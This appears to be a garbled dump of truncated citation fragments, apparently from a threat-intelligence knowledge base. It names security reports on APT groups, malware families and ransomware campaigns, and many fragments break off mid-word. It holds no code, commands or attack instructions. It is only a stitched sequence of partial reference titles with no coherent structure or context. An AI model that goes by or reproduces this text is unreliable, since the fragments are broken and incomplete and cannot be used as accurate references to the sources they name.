ruary 2022 ),(Citation: Mandiant Pulse Secure Zero-Day April 2021),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Fi

05 Sep 2017),(Citation: SentinelOne SocGholish Infrastructure November 2022),(Citation: TrendMicro Pikabot 2024),(Citation: Red Canary S

tion: Morphisec Snip3 May 2021),(Citation: PWC KeyBoys Feb 2017),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citatio
n: CERT-FR PYSA April 2020),(Citation: CoinTicker 2019),(Citation: Volexity Ivanti Zero-Day Exploitation January 2024),(Citation: Mandiant
tting Edge Part 3 February 2024),(Citation: Aqua Kinsing April 2020),(Citation: CoinTicker 2019),(Citation: CISA AppleJeus Feb 2021),(Citatio
May 2021),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Crowdstrike MUSTANG PANDA June 2018),(Citation: E
pt),(Citation: FireEye HAWKBALL Jun 2019),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Microsoft Volt Typhoon May 2023),(

AA21-200A APT40 July 2021),(Citation: NCC Group LAPSUS Apr 2022),

2024),(Citation: trendmicro xcsset xcode project 2020),(Citation: ESET Kobalos Jan 2021),(Citation: Volexity Ivanti Zero-Day Exploitation Jan

Mandiant UNC3890 Aug 2022),(Citation: Certfa Charming Kitten January 2021),(Citation: Proofpoint TA453 July2021),(Citation: MSTIC NO

,(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: ESET EvasivePanda 2024),(Citation: McAfee Lazarus Jul 202

2018),(Citation: Symantec Daggerfly 2023),(Citation: KISA Operation Muzabi),(Citation: FireEye CARBANAK June 2017),(Citation: Kaspersky
tion: synack 2016 review),(Citation: SentinelLabs reversing run-only applescripts 2021),(Citation: Red Canary NETWIRE January 2020),(Cita
cKeeper Bundlore Apr 2019),(Citation: trendmicro xcsset xcode project 2020),

Citation: US-CERT Emotet Jul 2018),(Citation: Mandiant UNC3313 Feb 2022),(Citation: Mandiant APT1 Appendix),(Citation: Symantec Wiarp
2023),(Citation: GitHub QuasarRAT),(Citation: ESET Operation Groundbait),(Citation: GitHub LaZagne Dec 2018),(Citation: ESET EvasivePa

N6 Feb 2019),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: Talos Smoke Loader July 2018),(Citation: CrowdStrike StellarPa

dules July 2019),(Citation: Cybereason Kimsuky November 2020),(Citation: Microsoft Network access Credential Manager)
7),(Citation: NCC Group LAPSUS Apr 2022),(Citation: Kaspersky Sodin July 2019),(Citation: Crowdstrike WhisperGate January 2022),(Citatio

isiMole June 2020),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: McAfee Bankshot),
urity Intelligence More Eggs Aug 2019),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Symantec Dragonfly),(Citation: Talos Manjusaka
on: CrowdStrike Ryuk January 2019),(Citation: Cylance Sodinokibi July 2019),(Citation: Fortinet Diavol July 2021),(Citation: Mandiant FIN7

n November 2020),
URST Backdoor December 2020),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Kaspersky Lyceum
ation: Cobalt Strike Manual 4.3 November 2020),(Citation: Malware Analysis Report 10135536-G),(Citation: Scarlet Mimic Jan 2016),(Citati
n: Novetta-Axiom),(Citation: ESET Dukes October 2019),

ant UNC3313 Feb 2022),(Citation: Kaspersky MoleRATs April 2019),(Citation: Symantec Dragonfly),(Citation: FireEye APT30),(Citation: Mand
rity Advisory GRU Brute Force Campaign July 2021),(Citation: Bitdefender FunnyDream Campaign November 2020),
paign July 2021),(Citation: Rostovcev APT41 2021),(Citation: KISA Operation Muzabi),(Citation: FireEye CARBANAK June 2017),(Citation: Tr

on: Huntress NPPSPY 2022),(Citation: ASERT Donot March 2018),(Citation: MSTIC FoggyWeb September 2021),(Citation: Palo Alto Unit 42
cduke),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),
n: FireEye APT30),(Citation: KISA Operation Muzabi),(Citation: Talos GravityRAT),(Citation: ESET Sednit USBStealer 2014),(Citation: Malwar
n: Malwarebytes Saint Bot April 2021),(Citation: Medium Ali Salem Bumblebee April 2022),(Citation: Check Point Black Basta October 2022
mber 2023),(Citation: Deep Instinct Black Basta August 2022),(Citation: Check Point Meteor Aug 2021),(Citation: BlackBerry Black Basta Ma
DarkTortilla Aug 2022),(Citation: Malwarebytes Targeted Attack against Saudi Arabia),(Citation: Unit 42 Valak July 2020),(Citation: CISA So

tion: ESET Dukes October 2019),(Citation: ESET Lazarus Jun 2020),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: US District Court In

SentinelOne Agrius 2021),(Citation: IBM MegaCortex),(Citation: VPNFilter Router),(Citation: Ready.gov IT DRP)

Citation: Cybereason WhisperGate February 2022),(Citation: US-CERT Ukraine Feb 2016),(Citation: Unit 42 WhisperGate January 2022),(Cit
tion: Nltest Manual),(Citation: Trend Micro Black Basta October 2022),(Citation: Fortinet TrickBot),(Citation: Elastic Latrodectus May 2024),

crosoft GPO Security Filtering),(Citation: GitHub Bloodhound),(Citation: Microsoft WMI Filters)

19),(Citation: RATANKBA),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: ESET Bad Rabbit),(Citation: Kaspersky Darkh
spersky Tomiris Sep 2021),(Citation: Cylance Dust Storm),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: Proofpoint Operation T

SET Sednit 2017 Activity),(Citation: ClearSky Siamesekitten August 2021),(Citation: Prevailion DarkWatchman 2021),(Citation: ESET Ebury F

CARBANAK June 2017),(Citation: Kaspersky QakBot September 2021),(Citation: GitHub Pupy),(Citation: Cybereason Kimsuky November 202
y GRU Brute Force Campaign July 2021),(Citation: Symantec Leafminer July 2018),(Citation: Microsoft HAFNIUM March 2020),(Citation: KIS
cureworks IRON HEMLOCK Profile),(Citation: BiZone Lizar May 2021),(Citation: Cybereason PowerLess February 2022),(Citation: FireEye TE
URSA Sophisticated Loader 2020),(Citation: Bleeping Computer Op Sharpshooter March 2019),(Citation: PWC WellMess C2 August 2020),(
ay April 2021),(Citation: ESET Sednit Part 3),(Citation: ESET Operation Groundbait),(Citation: FireEye SMOKEDHAM June 2021),(Citation: PW

itation: Bitdefender FunnyDream Campaign November 2020),(Citation: Google TAG COLDRIVER January 2024),(Citation: DOJ Iran Indictme
Court Indictment GRU Unit 74455 October 2020),(Citation: Dell Threat Group 2889),(Citation: ClearSky Siamesekitten August 2021),(Citatio

tion: TechNet RDP Gateway),(Citation: TechNet RDP NLA)

m Campaign November 2020),

MI),(Citation: Microsoft PLATINUM April 2016),(Citation: RedCanary Mockingbird May 2020),(Citation: GitHub PoshC2),(Citation: CrowdStr
2021),(Citation: SentinelOne Agrius 2021),(Citation: Cyberreason Anchor December 2019),(Citation: Microsoft Albanian Government Atta

019),(Citation: Amazon AWS Temporary Security Credentials),(Citation: Amazon S3 Security, 2019),(Citation: TechNet Firewall Design)

020),(Citation: Palo Alto OilRig Oct 2016),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Mandiant Cutting Edge Part 2 Janu
ky MoleRATs April 2019),(Citation: ClearSky Lazarus Aug 2020),(Citation: Talos Manjusaka 2022),(Citation: Securelist Kimsuky Sept 2013),(

endMicro Confucius APT Feb 2018),(Citation: Mandiant FIN12 Oct 2021),(Citation: CISA GRU29155 2024),(Citation: Github PowerShell Emp

tion: Mandiant FIN13 Aug 2022),(Citation: CISA SoreFang July 2016),(Citation: NCSC APT29 July 2020),(Citation: DFIR Report APT35 ProxySh
e Wolf),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Carnegie Mellon University Su

Dec 2017),(Citation: ESET Sednit Part 1),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Microsoft PLATINUM April 2016),(Ci
tation: LogRhythm WannaCry),(Citation: CISA GRU29155 2024),(Citation: US-CERT Emotet Jul 2018),(Citation: Github PowerShell Empire),(
e 2017),(Citation: NCC Group LAPSUS Apr 2022),(Citation: McAfee Night Dragon),(Citation: Anomali Linux Rabbit 2018),(Citation: FireEye Re
17),(Citation: ESET Sednit Part 1),(Citation: DustySky),(Citation: Mandiant APT1 Appendix),(Citation: ESET Gelsemium June 2021),(Citation:
wdStrike Ryuk January 2019),(Citation: Volexity PowerDuke November 2016),(Citation: Securelist Kimsuky Sept 2013),(Citation: DOJ GRU In

elone apt32 macOS backdoor 2020),(Citation: Leonardo Turla Penquin May 2020),(Citation: Cisco Talos Intelligence Group),

le Jan 2022),(Citation: Mandiant APT43 March 2024),(Citation: CISA Play Ransomware Advisory December 2023),(Citation: SCILabs Malteir
gust 2021),(Citation: Google EXOTIC LILY March 2022),(Citation: Proofpoint TA427 April 2024),(Citation: DOJ Iran Indictments March 2018),

October 2010),(Citation: Talos Seduploader Oct 2017),(Citation: Unit 42 BackConfig May 2020),(Citation: Trend Micro Black Basta October

p3 May 2021),(Citation: Kaspersky Lyceum October 2021),(Citation: PWC KeyBoys Feb 2017),(Citation: FireEye APT19),(Citation: Microsoft

tation: Cybereason Cobalt Kitty 2017),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: SentinelOne Valak June 2020),(C

y Search Order),(Citation: Microsoft More information about DLL),(Citation: Microsoft Dynamic-Link Library Security),(Citation: Vulnerabilit

: ESET Crutch December 2020),(Citation: ESET Operation Groundbait),(Citation: SecureWorks BRONZE STARLIGHT Ransomware Operation
da April 2020),(Citation: FireEye APT41 Aug 2019),(Citation: Unit 42 C0d0so0 Jan 2016),(Citation: NCC Group Chimera January 2021),(Citatio
: Microsoft Using Software Restriction )

tation: Checkpoint MosesStaff Nov 2021),(Citation: Aqua TeamTNT August 2020),(Citation: TrendMicro DarkComet Sept 2014),(Citation: Sa
024),(Citation: FireEye FIN6 Apr 2019),(Citation: Proofpoint TA2541 February 2022),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Sec

Wiper March 2022),(Citation: Palo Alto Brute Ratel July 2022),(Citation: Microsoft ETW May 2018)

itation: Volexity Ivanti Zero-Day Exploitation January 2024),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Lazar

yer 2018),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Cita
on: Symantec Pasam May 2012),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Cit

: FireEye POSHSPY April 2017),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: US-CERT FALLCHILL Nov 2017),(Citation: N

c 2015),(Citation: Medium Metamorfo Apr 2020),(Citation: Volexity PowerDuke November 2016),(Citation: Secureworks DarkTortilla Aug 2
1 REvil March 2020),(Citation: McAfee Maze March 2020),(Citation: Microsoft Prestige ransomware October 2022),(Citation: Kaspersky So

),(Citation: synack 2016 review),(Citation: objsee mac malware 2017),

Operation Groundbait),(Citation: Amnesty Intl. Ocean Lotus February 2021),(Citation: Check Point Warzone Feb 2020),(Citation: Bitdefende

ation: Enigma Reviving DDE Jan 2018),(Citation: Microsoft ASR Nov 2017),(Citation: Microsoft ADV170021 Dec 2017),(Citation: Microsoft C
t Bumblebee April 2022),(Citation: ESET Hermetic Wizard March 2022),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: Securelist M
n: Eset Ramsay May 2020),(Citation: Securelist ScarCruft Jun 2016),(Citation: Proofpoint TA505 June 2018),(Citation: Talos GravityRAT),(Cit
itation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: Secureworks GOLD IONIC April 2024),(Citation: DustySky),(Citation: PsExe

lwarebytes Saint Bot April 2021),(Citation: Medium S2W WhisperGate January 2022),(Citation: trendmicro xcsset xcode project 2020),(Cita

Jul 2020),(Citation: file_upload_attacks_pt2)

Sandfly BPFDoor 2022),(Citation: FireEye FIN6 Apr 2019),(Citation: Lumen KVBotnet 2023),(Citation: Mandiant FIN13 Aug 2022),(Citation:
t 42 OutSteel SaintBot February 2022 ),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Microsoft DTC),(Citation: wardle evilquest pa

021),(Citation: Check Point Warzone Feb 2020),(Citation: Bitdefender APT28 Dec 2015),(Citation: Group IB APT 41 June 2021),(Citation: Me

re May 2023),(Citation: FireEye APT41 March 2020),(Citation: Morphisec Snip3 May 2021),
TCROISSANT February 2020),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Trusteer Carberp October 2010),(Citation: M

tion: Securelist BlackEnergy Nov 2014),(Citation: NCC Group Chimera January 2021),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Deb
ation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: Huntress INC Ransom Group August
FireEye APT28 Hospitality Aug 2017),(Citation: CISA AA20-301A Kimsuky),(Citation: Netscout Stolen Pencil Dec 2018),(Citation: US District C
n: FireEye Operation Double Tap),(Citation: Lumen KVBotnet 2023),(Citation: Novetta Winnti April 2015),(Citation: Aquino RARSTONE),(Cit
019),(Citation: Palo Alto MoonWind March 2017),(Citation: Talos ZxShell Oct 2014),(Citation: CISA AR18-352A Quasar RAT December 2018
: Cybereason Oceanlotus May 2017),(Citation: Novetta-Axiom),(Citation: US District Court Indictment GRU Oct 2018),(Citation: Cadet Blizz

tials),(Citation: Microsoft Protected Users Security Group)

2019),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: ADSecurity Mimikatz DCSync),(Citation: Microsoft Replication ACL
z),(Citation: CISA GRU29155 2024),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Symantec MuddyWater Dec 2018),(Citatio
ation: Mandiant FIN13 Aug 2022),(Citation: Netscout Stolen Pencil Dec 2018),(Citation: BiZone Lizar May 2021),(Citation: PowerSploit Docu
April 2016),(Citation: Impacket Tools),(Citation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: Mandiant FIN12 Oct 2021),(Citati

2014),(Citation: Impacket Tools),(Citation: Microsoft Gsecdump),(Citation: Wikipedia pwdump),(Citation: FireEye APT33 Guardrail),(Citatio
(Citation: S2 Grupo TrickBot June 2017),(Citation: Crowdstrike MUSTANG PANDA June 2018),(Citation: CISA AR21-126A FIVEHANDS May 2
stang Panda January 2020),(Citation: emotet_trendmicro_mar2023),(Citation: Morphisec Snip3 May 2021),(Citation: ESET Dukes October 2
st MuddyWater Oct 2018),(Citation: Talos Zeus Panda Nov 2017),(Citation: Unit 42 Valak July 2020),(Citation: ESET Turla PowerShell May 2

r Pikabot 2023),(Citation: Trendmicro_IcedID),(Citation: SentinelLabs reversing run-only applescripts 2021),(Citation: SentinelOne Agrius 2
vember 2022),(Citation: Trend Micro Tick November 2019),(Citation: Cybereason Bazar July 2020),(Citation: Securelist Brazilian Banking M
rab and REvil September 2019),(Citation: Red Canary Qbot),(Citation: Cybereason Valak May 2020),(Citation: ESET Gelsemium June 2021),(

PT3 Adversary Emulation Plan),(Citation: Trend Micro Daserf Nov 2017),(Citation: Talos GravityRAT),(Citation: Cobalt Strike Manual 4.3 Nov

Aug 2020),(Citation: Symantec Dragonfly),(Citation: ESET Operation Spalax Jan 2021),(Citation: Carbon Black HotCroissant April 2020),(Cita
itation: Volexity PowerDuke November 2016),(Citation: Fortinet Diavol July 2021),(Citation: ESET Operation Spalax Jan 2021),(Citation: Zsc

tion: ESET Operation Spalax Jan 2021),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: MalwareBytes LazyScripter Feb 2021),(Citati
),(Citation: FireEye FIN6 Apr 2019),(Citation: ClearSky Lazarus Aug 2020),(Citation: Symantec Palmerworm Sep 2020),(Citation: ESET Opera

rutch December 2020),(Citation: ESET RTM Feb 2017),(Citation: Securelist ScarCruft May 2019),(Citation: ESET Attor Oct 2019),(Citation: M
c Buckeye),

3chang November 2014),(Citation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: Elastic Latrodectus May 2024),(Citation: FireEy
o December 2019),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Symantec Buckeye),(Citation: Baumgartner Naikon 20

ber 2020),(Citation: Volexity Patchwork June 2018),(Citation: FireEye Shining A Light on DARKSIDE May 2021),(Citation: Proofpoint TA453 M

2020),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Amnesty Intl. Ocean Lotus February 2021),(Citation: Check P
Wolf),(Citation: Kaspersky MoleRATs April 2019),(Citation: Proofpoint TA2541 February 2022),(Citation: Trend Micro Qakbot December 20

e Sleet 2024),(Citation: SANS Windshift August 2018),(Citation: Lookout Dark Caracal Jan 2018),(Citation: Security Intelligence More Eggs A

2022),(Citation: FireEye BOOTRASH SANS),(Citation: Microsoft FinFisher March 2018),(Citation: Mandiant M Trends 2016),(Citation: FireEy

m),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Microsoft Volt Typhoon May 2023),(Citation: Kaspersky Lab SynAck May 201
tation: Symantec Dragonfly),(Citation: Trend Micro Qakbot December 2020),(Citation: Securelist Kimsuky Sept 2013),(Citation: Talos Smok

tion: RATANKBA),(Citation: McAfee Lazarus Resurfaces Feb 2018),(Citation: McAfee Maze March 2020),(Citation: AlienVault Sykipot 2011)

Snip3 May 2021),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Trend Micro Totbrick Oct 2016),(Citation: S2 Gru

Group IB Cobalt Aug 2017),(Citation: MalwareBytes Ngrok February 2020),(Citation: Talos Cobalt Group July 2018),(Citation: Trend Micro
ESET Telebots Dec 2016),(Citation: Talos ZxShell Oct 2014),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: NJCCIC Ursnif Sept 2016),(C

tation: Symantec MuddyWater Dec 2018),(Citation: ESET Okrum July 2019),(Citation: Group IB Silence Sept 2018),(Citation: BitDefender Ch
on: Kaspersky ToddyCat Check Logs October 2023),(Citation: cobaltstrike manual),(Citation: Kaspersky ToddyCat June 2022),(Citation: FireE
ckpoint Dridex Jan 2021),(Citation: NGLite Trojan),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: F
dLocker June 2020),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: PowerSploit Documentation),(Citation: Talos TinyTurla September 2
Gelsemium June 2021),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Binary Defense Emotes Wi-
(Citation: Group-IB Anunak),(Citation: Microsoft Prestige ransomware October 2022),(Citation: Group IB Cobalt Aug 2017),(Citation: McAfe
T3 eml),(Citation: FireEye FIN6 April 2016),(Citation: Unit42 OilRig Playbook 2023),(Citation: Cybereason Bumblebee August 2022),(Citation
tion: Microsoft Prestige ransomware October 2022),(Citation: Sygnia Emperor Dragonfly October 2022),(Citation: Talos Olympic Destroyer
A20-259A Iran-Based Actor September 2020),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Intezer TeamTNT September 20
er August 2021),(Citation: Securelist GCMAN),(Citation: Symantec Shuckworm January 2022),(Citation: objsee mac malware 2017),

y Lazarus Aug 2020),(Citation: Fortinet Diavol July 2021),(Citation: DFIR Ryuk's Return October 2020),(Citation: DFIR Conti Bazar Nov 2021)
Citation: Fidelis njRAT June 2013),(Citation: Kaspersky LuminousMoth July 2021),(Citation: Kaspersky Transparent Tribe August 2020),(Citati

Citation: Ensilo Darkgate 2018),(Citation: Unit 42 Lucifer June 2020),(Citation: Aqua Kinsing April 2020),(Citation: RedCanary Mockingbird M

on: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Cisco Talos Intelligence Group),(Citation: Trend Micro Sk

Citation: Leonardo Turla Penquin May 2020),(Citation: Red Canary NETWIRE January 2020),(Citation: Medium Anchor DNS July 2020),(Citati
ERT Emotet Jul 2018),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: FireEye FIN10 June 2017),(Citation: DFIR_Quantum_Ra

Citation: ESET Gelsemium June 2021),(Citation: Microsoft PLATINUM April 2016),(Citation: ClearSky Siamesekitten August 2021),(Citation:
ndiant APT1 Appendix),(Citation: Kaspersky MoleRATs April 2019),(Citation: cobaltstrike manual),(Citation: Symantec Dragonfly),(Citation:
ar 2021),(Citation: Symantec Tortoiseshell 2019),(Citation: Lumen Versa 2024),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citati

pic Destroyer 2018),(Citation: Check Point Pay2Key November 2020),(Citation: Sophos Maze VM September 2020),(Citation: SecureWorks
ation: ESET Ebury May 2024),(Citation: Unit42 OceanLotus 2017),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Cita

March 2018),(Citation: Kaspersky TajMahal April 2019),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: Joint Cybers
: DFIR_Quantum_Ransomware),(Citation: Proofpoint TA2541 February 2022),(Citation: Kaspersky Transparent Tribe August 2020),(Citation

: Gallagher 2015),(Citation: Bitdefender LuminousMoth July 2021),(Citation: Volexity Ocean Lotus November 2020),

Citation: ClearSky Siamesekitten August 2021),(Citation: Proofpoint TA2541 February 2022),(Citation: Google EXOTIC LILY March 2022),(Cit

d TAG 2023),(Citation: Kaspersky QakBot September 2021),(Citation: trendmicro xcsset xcode project 2020),(Citation: Kroll Qakbot June 2

der August 2021),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: FoxIT Wocao December 2019),(Citation: Microsoft Deep

arkhotel Aug 2015),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: ESET Lazarus Jun 2020),(Citation: Secureworks GOL

on: SolarWinds Sunburst Sunspot Update January 2021),(Citation: Secureworks GOLD SOUTHFIELD),(Citation: US District Court Indictment
ary 2022),(Citation: Lazarus APT January 2022),(Citation: TrendMicro EarthLusca 2022),(Citation: KISA Operation Muzabi),(Citation: Rewte
une 2018),(Citation: Crowdstrike Qakbot October 2020),(Citation: Trend Micro TA505 June 2019),(Citation: Bleeping Computer Latrodectus

alt Group July 2018),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: TrendMicro Cobalt Group Nov 2017),(Citation
021),(Citation: ClearSky Lazarus Aug 2020),(Citation: Volexity PowerDuke November 2016),(Citation: ESET Operation Spalax Jan 2021),(Cita

e November 2016),(Citation: Securelist Kimsuky Sept 2013),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: DomainTools WinterV
ation: Malwarebytes Saint Bot April 2021),(Citation: Trellix Darkgate 2023),(Citation: FBI Ragnar Locker 2020),(Citation: CISA AA24-038A P
histicated Loader 2020),(Citation: Group IB GrimAgent July 2021),(Citation: McAfee Cuba April 2021),(Citation: Kaspersky Ferocious Kitten
b September 2018),(Citation: US-CERT HOTCROISSANT February 2020),(Citation: PWC KeyBoys Feb 2017),(Citation: Secureworks Karagany
Layover September 2021),(Citation: Kaspersky QakBot September 2021),(Citation: Mandiant UNC3890 Aug 2022),(Citation: MalwareBytes

IN13 Aug 2022),(Citation: FOX-IT May 2016 Mofang),(Citation: Kaspersky Turla Aug 2014),(Citation: Kaspersky Poseidon Group),(Citation: B
reEye SMOKEDHAM June 2021),(Citation: ESET Operation Groundbait),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: CISA AR21-12

(Citation: RATANKBA),(Citation: AlienVault Sykipot 2011),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: US-CERT Volg

e 2017),(Citation: Bitdefender StrongPity June 2020),(Citation: Secpod Winexe June 2017),(Citation: xCmd),(Citation: Medium S2W Whispe
er 2020),(Citation: Trend Micro AvosLocker Apr 2022),(Citation: AcidRain JAGS 2022),(Citation: SentinelOne Hermetic Wiper February 2022
16),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: Unit 42 OilRig Sept 2018),(Citation: McAfee GhostSecret),(Citation: US-C
Ramsay May 2020),(Citation: Kaspersky Darkhotel),(Citation: Softpedia MinerC),(Citation: Windows Commands JPCERT),(Citation: NSA MS
ankenstein June 2019),(Citation: McAfee Lazarus Jul 2020),(Citation: Cybereason Chaes Nov 2020),(Citation: Uptycs Confucius APT Jan 202
tation: Chronicle Winnti for Linux May 2019),(Citation: ESET Kobalos Jan 2021),

October 2020),(Citation: District Court of NY APT10 Indictment December 2018),(Citation: Symantec Cicada November 2020),(Citation: M

),(Citation: FireEye APT34 July 2019),(Citation: AADInternals Documentation),(Citation: FireEye APT33 Guardrail),(Citation: CERT-FR PYSA A

olorigate),(Citation: Aqua Kinsing April 2020),(Citation: Github PowerShell Empire),(Citation: Adsecurity Mimikatz Guide),(Citation: CISA AA
PT41 2021),(Citation: Mandiant FIN13 Aug 2022),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: CISA AA20-301A Kimsuky),

May 2021),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Amnesty Intl. Ocean Lotus February 2021),(Citation: Cro

olf),(Citation: Kaspersky MoleRATs April 2019),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Proofpoint TA2541 February 2022),(Cita
Micro Pawn Storm April 2017),(Citation: DOJ GRU Indictment Jul 2018),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Syman
orce Campaign July 2021),(Citation: Microsoft Security Alerts for Azure AD Roles),(Citation: TechNet Credential Theft),(Citation: Microsoft C

5 October 2020),(Citation: Volexity Ivanti Zero-Day Exploitation January 2024),(Citation: Dell TG-1314),(Citation: FoxIT Wocao December 2
y July 2023),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Talos Nyetya June 2017),(Citation: FireEye FIN10 June 2017),(Citati
asarRAT),(Citation: FireEye Periscope March 2018),(Citation: SecureList Silence Nov 2017),(Citation: IBM TA505 April 2020),(Citation: Check
n: ESET Gelsemium June 2021),(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015),(Citation: Unit 42 Gamaredon February 202
1),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: Morphisec Snip3 May 2021),(Citation: ASERT Donot March 2018),(Citation
ber 2019),(Citation: HP SVCReady Jun 2022),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Cyberint Qakbot May

tation: Medium Eli Salem GuLoader April 2021),(Citation: Morphisec Snip3 May 2021),(Citation: Symantec Inception Framework March 20
e CozyDuke),(Citation: ESET Turla Mosquito Jan 2018),(Citation: Talent-Jump Clambling February 2020),(Citation: IBM Grandoreiro April 20
atchwork Dec 2017),(Citation: Unit42 Xbash Sept 2018),(Citation: FireEye APT41 Aug 2019),(Citation: Forcepoint Monsoon),(Citation: FireE

2019),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Proofpoint TA2541 February 2022),(Citation: cobaltstrike manual),(Cit
itation: ESET Sednit Part 3),(Citation: Cybereason Bumblebee August 2022),(Citation: ESET RTM Feb 2017),(Citation: Check Point Warzone

on: Malwarebytes Kimsuky June 2021),(Citation: McAfee Cuba April 2021),(Citation: PowerSploit Documentation),(Citation: IBM MegaCor
ocess Token)

ation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Crowdstrike Indrik November 2018),(Citation: CheckPoint Naik

7),(Citation: ESET Lazarus Jun 2020),(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023),(Citation: CrowdStrike IceApple May 2
-ib_redcurl1),(Citation: ESET Telebots July 2017),(Citation: Binary Defense Emotes Wi-Fi Spreader),
4),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: ESET Crutch December 2020),(Citation: FireEye Periscope March 2018),(Citation:

ation: Microsoft Actinium February 2022),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: CISA AppleJeus F

ndiant FIN7 Apr 2022),(Citation: Talos Kimsuky Nov 2021),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: MalwareBytes LazySc

October 2020),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: CrowdStrike AQUATIC PANDA December 2021),
4),(Citation: ESET EvasivePanda 2024),
ember 2021),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: Talos C
spersky ShadowPad Aug 2017),(Citation: Talos PoetRAT October 2020),(Citation: 360 Machete Sep 2020),(Citation: US-CERT TA18-074A),(C
May 2019),(Citation: Microsoft PLATINUM April 2016),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Threatpost Sauron),(Citation: Jo

liere, Liam O Murchu, Eric Chien February 2011),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: ESET Industroyer),(Citation: Ma
18),(Citation: ESET Attor Oct 2019),(Citation: Fidelis njRAT June 2013),(Citation: Bitdefender FunnyDream Campaign November 2020),(Cita
August 2022),(Citation: ESET Operation Groundbait),(Citation: ESET Zebrocy Nov 2018),(Citation: ESET LightNeuron May 2019),(Citation: Cy
TWIRE March 2019),(Citation: ESET Okrum July 2019),(Citation: Eset Ramsay May 2020),(Citation: Bitdefender FunnyDream Campaign Nov
n: Palo Alto Networks BBSRAT),(Citation: McAfee Lazarus Resurfaces Feb 2018),(Citation: Kaspersky TajMahal April 2019),(Citation: PaloAlt
e APT41 Aug 2019),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Huntress INC Ransomware May 2024),(Citation: PWC C
Citation: Radware Micropsia July 2018),(Citation: Unit 42 VERMIN Jan 2018),(Citation: Janicab),(Citation: Kaspersky Transparent Tribe Augu
n: Kaspersky TajMahal April 2019),(Citation: S2W Racoon 2022),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: M
20),(Citation: ESET Ebury May 2024),(Citation: Forcepoint Monsoon),(Citation: Microsoft NICKEL December 2021),(Citation: group-ib_redc

021),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: FireEye APT41 March 2020),(Citation: Symantec BITS May 2007),(Citation: Micro

